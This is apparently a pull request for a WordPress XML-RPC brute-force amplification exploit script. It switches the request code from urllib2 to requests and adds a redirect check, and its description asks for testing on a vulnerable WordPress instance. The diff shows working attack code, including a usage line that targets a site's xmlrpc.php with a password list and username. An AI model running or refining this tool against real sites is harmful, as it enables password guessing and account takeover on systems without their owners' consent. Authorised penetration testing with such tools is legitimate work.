### PR TITLE
Fixed HTTP request header bug. Replaced use of urllib with requests. …

### DIFF
--- a/wordpress-xmlrpc-brute.py
+++ b/wordpress-xmlrpc-brute.py
@@ -1,4 +1,4 @@
-#!/usr/bin/python
+#!/usr/bin/env python
 # Wordpress XML-RPC Brute Force Amplification Exploit by 1N3
 # Last Updated: 20170215
 # https://crowdshield.com
@@ -11,8 +11,7 @@
 # USAGE: ./wp-xml-brute http://target.com/xmlrpc.php passwords.txt username
 #
 
-import time, urllib, urllib2, sys, requests, ssl
-from array import *
+import time, requests, sys, ssl
 
 WAIT_TIME = 0
 PASSWD_PER_REQUEST = 1000
@@ -48,13 +47,11 @@ def banner(argv, usage = False, url = None, users = None):
         print bcolors.WARNING + "+ -- --=[Brute forcing target: " + url + " with usernames: " + str(users) + "" + bcolors.ENDC
 
 def send_request(url, data):
-    ctx = ssl.create_default_context()
-    ctx.check_hostname = False
-    ctx.verify_mode = ssl.CERT_NONE
-    header = 'headers={"Content-Type": "application/xml"}'
-    req = urllib2.Request(url, data, headers={'Content-Type': 'application/xml'})
-    rsp = urllib2.urlopen(req,context=ctx)
-    return rsp.read()
+    headers = {"Content-Type": "application/xml"}
+    r = requests.post(url, data=data, headers=headers, allow_redirects=False)
+    if r.status_code == 302:
+        raise Exception('unexpected error: server performed redirect, should not happen.')
+    return r.text
 
 def check_response(content, user, passwd):
     if "incorrect" in content.lower():


### PR DESCRIPTION
…Throws exception if xmlrpc request gets redirected.

Please test on a vulnerable WP instance to make sure everything works as expected.